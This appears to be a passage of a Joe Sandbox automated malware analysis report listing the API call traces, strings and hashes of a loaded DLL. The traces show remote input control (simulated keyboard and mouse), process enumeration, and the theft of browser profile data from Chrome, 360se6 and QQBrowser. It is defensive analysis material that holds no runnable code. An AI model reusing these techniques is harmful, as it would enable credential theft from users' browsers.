                                                          • String ID: KERNEL32.dll$MultiByteToWideChar$WideCharToMultiByte$lstrlenA
                                                          • API String ID: 1309867234-4059950253
                                                          • Opcode ID: de985ad3ca3c376d577d203f73a74155a7ef575b49d7e2c64786a38d6ce3dcf2
                                                          • Instruction ID: d930753b1a83691b9448020b77acedb0431273c8944958dfca86a203c0a050f8
                                                          • Opcode Fuzzy Hash: de985ad3ca3c376d577d203f73a74155a7ef575b49d7e2c64786a38d6ce3dcf2
                                                          • Instruction Fuzzy Hash: 861136B694031837DA10A7B56C49F8B3E9CCF867B0F15052AFB00B7180DD24A804C6F2
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,00000010), ref: 1002BD4B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BD52
                                                            • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                            • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: .$2$3$K$L$N$R$S$d$n$v
                                                          • API String ID: 2574300362-924470386
                                                          • Opcode ID: 0a80541538b13eb98ff8583e53880da1e37687e13317643f967dd40b626b0a5f
                                                          • Instruction ID: e9478d8d8c80935fd8ff63d2a19e63404a72a50bb6816d5186a561986cbbe352
                                                          • Opcode Fuzzy Hash: 0a80541538b13eb98ff8583e53880da1e37687e13317643f967dd40b626b0a5f
                                                          • Instruction Fuzzy Hash: 3A317F75D092CCDEDB01CBE8D884ADEBFB8AF2A240F084159E54577382C2794608CBB6
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetCurrentThreadId,771B0BD0,00000000,?,771AF550), ref: 1002BF0A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BF13
                                                          • LoadLibraryA.KERNEL32(USER32.dll,GetThreadDesktop,?,771AF550), ref: 1002BF21
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BF24
                                                          • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 1002BF48
                                                          • SetThreadDesktop.USER32(?,?,771AF550), ref: 1002BF5E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$DesktopInformationObjectThreadUser
                                                          • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$KERNEL32.dll$USER32.dll
                                                          • API String ID: 2607951617-608436089
                                                          • Opcode ID: 260afe34fd4c68afadb73e998c92c80956322b70d1d4d6c5dcd413ab2e046d08
                                                          • Instruction ID: c78d99be652b19315987e14cb35b5e183e4f240bfeef975a01ad198cc4a000aa
                                                          • Opcode Fuzzy Hash: 260afe34fd4c68afadb73e998c92c80956322b70d1d4d6c5dcd413ab2e046d08
                                                          • Instruction Fuzzy Hash: BE01B5B674021D2BE610A7B9AC88FDB774CEBC0761F854532FB04D2141EA6DB84596B4
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
                                                            • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                            • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                          • GetDC.USER32(00000000), ref: 10017E52
                                                          • QueryPerformanceFrequency.KERNEL32(00000030), ref: 10017E5F
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017E81
                                                          • GetDeviceCaps.GDI32(?,00000076), ref: 10017E9E
                                                          • GetDeviceCaps.GDI32(?,00000075), ref: 10017EA9
                                                          • CreateCompatibleDC.GDI32(?), ref: 10017EC7
                                                          • CreateCompatibleDC.GDI32(?), ref: 10017ED0
                                                          • CreateCompatibleDC.GDI32(?), ref: 10017ED9
                                                          • CreateDIBSection.GDI32(?,?,00000000,00000058,00000000,00000000), ref: 10017F26
                                                          • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10017F37
                                                          • SelectObject.GDI32(?,?), ref: 10017F4A
                                                          • SelectObject.GDI32(?,?), ref: 10017F54
                                                          • #823.MFC42(?,?,?,?,00000000), ref: 10017F5F
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$Compatible$CapsDeviceObjectSectionSelect$#823CursorFrequencyLoadPerformanceQueryReleaseUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1396098503-0
                                                          • Opcode ID: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                          • Instruction ID: f5b09e1389df2f3a8d9c5176518bf7bbc65b6c3c0f8f13021ea446bacafcd8a0
                                                          • Opcode Fuzzy Hash: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                          • Instruction Fuzzy Hash: 2981F2B5504B459FD320CF29C884A6BFBF9FB88704F008A1DE58A87750DB79F8058B91
                                                          APIs
                                                            • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                            • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                            • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                            • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                            • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                          • SetCursorPos.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A28
                                                          • WindowFromPoint.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A30
                                                          • SetCapture.USER32(00000000,?,?,?,?,1001751F,?,?,00000000), ref: 10017A37
                                                          • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A4D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10017A50
                                                          • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A5E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10017A61
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10017A9A
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10017AB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                          • String ID: USER32.dll$keybd_event$mouse_event
                                                          • API String ID: 1441364844-718119381
                                                          • Opcode ID: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
                                                          • Instruction ID: 2451a04a9bde1e7bfa8f86e37c24795d67c21f324d001409fd558fbe77f3f18c
                                                          • Opcode Fuzzy Hash: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
                                                          • Instruction Fuzzy Hash: AD515B31BC471576F234CA648C87F4A7AA4FB85F90F708611B708BE1C4D6F0F980869A
                                                          APIs
                                                            • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                            • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                            • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                            • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                            • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                          • SetCursorPos.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D88
                                                          • WindowFromPoint.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D90
                                                          • SetCapture.USER32(00000000,?,?,?,?,1001697A,?,?), ref: 10016D97
                                                          • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001697A,?,?), ref: 10016DAD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10016DB0
                                                          • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001697A,?,?), ref: 10016DBE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10016DC1
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10016DFA
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10016E14
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                          • String ID: USER32.dll$keybd_event$mouse_event
                                                          • API String ID: 1441364844-718119381
                                                          • Opcode ID: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                          • Instruction ID: 9bdd7654e0fc0f02893d67ce9a41b80379b50915a00eb774664f2f349eb60d67
                                                          • Opcode Fuzzy Hash: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                          • Instruction Fuzzy Hash: C3515E3ABC0729B7F630DA64CD47F5A6A94EB49F90F314615B704BE1C1D5F0F8808A99
                                                          APIs
                                                            • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                            • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D12
                                                          • LoadLibraryA.KERNEL32(CHROMEUSERINFO.dll,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D22
                                                          • GetProcAddress.KERNEL32(00000000,fnGetChromeUserInfo), ref: 10002D3E
                                                          • GetProcAddress.KERNEL32(00000000,fnDeleteChromeUserInfo), ref: 10002D4C
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E53
                                                          • LocalSize.KERNEL32(00000000), ref: 10002E5C
                                                          • LocalFree.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E6C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$AddressProc$AllocLibraryLoad$FreeSize
                                                          • String ID: CHROMEUSERINFO.dll$CHROME_NO_DATA$CHROME_UNKNOW$fnDeleteChromeUserInfo$fnGetChromeUserInfo
                                                          • API String ID: 1379963177-1650604611
                                                          • Opcode ID: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                          • Instruction ID: 13833c0b53df42460e1e6170d0b02e4772bea98369ed9403c64bee1aaa194fbe
                                                          • Opcode Fuzzy Hash: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                          • Instruction Fuzzy Hash: DF4123716002585FD728CF288C45AAF7BD5FB8A7A0F580729F90AE7780CB79DE018791
                                                          APIs
                                                          • #537.MFC42(360se6.exe), ref: 1000F047
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F05F
                                                          • #540.MFC42 ref: 1000F069
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F09B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0B3
                                                          • #800.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0C4
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0CE
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000F0ED
                                                          • #800.MFC42 ref: 1000F101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
                                                          • API String ID: 1983172782-1244823433
                                                          • Opcode ID: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                          • Instruction ID: e9c89288d271108546bef61020c2a1418b1faed9b041f6e65e1a09c7bde258f6
                                                          • Opcode Fuzzy Hash: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                          • Instruction Fuzzy Hash: F6216579408788ABE364DB54D942FDFB7D4EB84710F40891CF29D821D6EB74A504CBA3
                                                          APIs
                                                          • #537.MFC42(QQBrowser.exe), ref: 1000F147
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F15F
                                                          • #540.MFC42 ref: 1000F169
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F19B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1B3
                                                          • #800.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1C4
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1CE
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000F1ED
                                                          • #800.MFC42 ref: 1000F201
                                                          Strings
                                                          • \AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 1000F1A0
                                                          • C:\Users\, xrefs: 1000F195
                                                          • QQBrowser.exe, xrefs: 1000F142
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
